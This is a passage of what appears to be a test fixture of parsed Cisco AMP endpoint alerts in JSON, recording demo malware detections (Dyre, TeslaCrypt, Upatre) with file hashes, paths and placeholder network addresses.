"cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:20:59.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533669667045638188", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 779000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533669667045638000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 53873, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:20:00.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "f5:8f:96:c3:53:1c" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.event_type_id": 1107296279, - "cisco.amp.file.disposition": "Clean", - "cisco.amp.file.parent.disposition": "Clean", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.cve": [ - "CVE-2015-7204" - ], - "cisco.amp.related.mac": [ - "f5:8f:96:c3:53:1c" - ], - "cisco.amp.timestamp_nanoseconds": 0, - "cisco.amp.vulnerabilities": [ - { - "cve": "CVE-2015-7204", - "name": "Mozilla Firefox", - "score": "6.8", - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204", - "version": "41.0" - } - ], - "event.action": "Vulnerable Application Detected", - "event.category": [ - "file" - ], - "event.dataset": "cisco.amp", - "event.id": 15210587194928, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 1, - "event.start": "2021-01-15T10:20:00.000Z", - "file.hash.sha256": "4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f", - "file.name": "firefox.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Exploit_Prevention", - "host.name": "Demo_AMP_Exploit_Prevention", - "input.type": "log", - "log.offset": 55192, - "process.hash.sha256": "0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894", - "related.hash": [ - "4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f" - ], - "related.hosts": [ - "Demo_AMP_Exploit_Prevention" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:19:59.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533669409347600427", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 257000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533669409347600000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 56650, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:19:58.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533669405052633129", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 847000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533669405052633000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 59295, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:18:58.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533669147354595368", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 375000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533669147354595000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 60614, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:18:57.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533669143059628070", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 968000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533669143059628000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 63259, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:18:25.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176259286289612895", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 669000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176259286289613000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 64578, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:18:13.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176259234750005342", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 657000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176259234750005000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 65897, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:18:01.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176259183210397789", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 645000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176259183210398000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 67216, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:58.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "e1:e5:94:ea:a5:44" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6180335966167760897", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "e1:e5:94:ea:a5:44" - ], - "cisco.amp.timestamp_nanoseconds": 875000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6180335966167761000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b2e15a06b0cca8a926c94f8a8eae3d88", - "file.hash.sha1": "f9b02ad8d25157eebdb284631ff646316dc606d5", - "file.hash.sha256": "fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc", - "file.name": "Fax.exe", - "file.path": "\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Upatre", - "host.name": "Demo_Upatre", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 68535, - "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e", - "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9", - "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", - "process.name": "explorer.exe", - "process.pid": 3164, - "related.hash": [ - "fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc", - "b2e15a06b0cca8a926c94f8a8eae3d88", - "f9b02ad8d25157eebdb284631ff646316dc606d5" - ], - "related.hosts": [ - "Demo_Upatre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:57.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533668885361590309", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 672000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533668885361590000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 70133, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:50.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176259135965757532", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 8000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176259135965757000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 74097, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:41.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "90:61:b5:c9:13:79" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", - "cisco.amp.event_type_id": 1107296272, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "90:61:b5:c9:13:79" - ], - "cisco.amp.timestamp_nanoseconds": 291000000, - "event.action": "Executed malware", - "event.category": [ - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 1489955900291000600, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 3, - "event.start": "2021-01-15T10:17:41.000Z", - "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "fileset.name": "amp", - "host.hostname": "Demo_TeslaCrypt", - "host.name": "Demo_TeslaCrypt", - "input.type": "log", - "log.offset": 75414, - "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", - "related.hash": [ - "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370" - ], - "related.hosts": [ - "Demo_TeslaCrypt" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:40.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "90:61:b5:c9:13:79" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6159251520740130915", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "90:61:b5:c9:13:79" - ], - "cisco.amp.timestamp_nanoseconds": 3000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6159251520740131000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", - "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", - "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "file.name": "rjtsbks.exe", - "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", - "fileset.name": "amp", - "host.hostname": "Demo_TeslaCrypt", - "host.name": "Demo_TeslaCrypt", - "host.os.family": "windows", - "host.os.platform": "windows", - "input.type": "log", - "log.offset": 76706, - "related.hash": [ - "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "209a288c68207d57e0ce6e60ebf60729", - "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" - ], - "related.hosts": [ - "Demo_TeslaCrypt" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:39.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "90:61:b5:c9:13:79" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6159251516445163618", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "90:61:b5:c9:13:79" - ], - "cisco.amp.timestamp_nanoseconds": 988000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6159251516445164000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", - "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", - "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "file.name": "rjtsbks.exe", - "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", - "fileset.name": "amp", - "host.hostname": "Demo_TeslaCrypt", - "host.name": "Demo_TeslaCrypt", - "host.os.family": "windows", - "host.os.platform": "windows", - "input.type": "log", - "log.offset": 78028, - "related.hash": [ - "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "209a288c68207d57e0ce6e60ebf60729", - "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" - ], - "related.hosts": [ - "Demo_TeslaCrypt" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:38.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "90:61:b5:c9:13:79" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6159251512150196266", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "90:61:b5:c9:13:79" - ], - "cisco.amp.timestamp_nanoseconds": 942000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6159251512150196000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", - "file.hash.sha1": 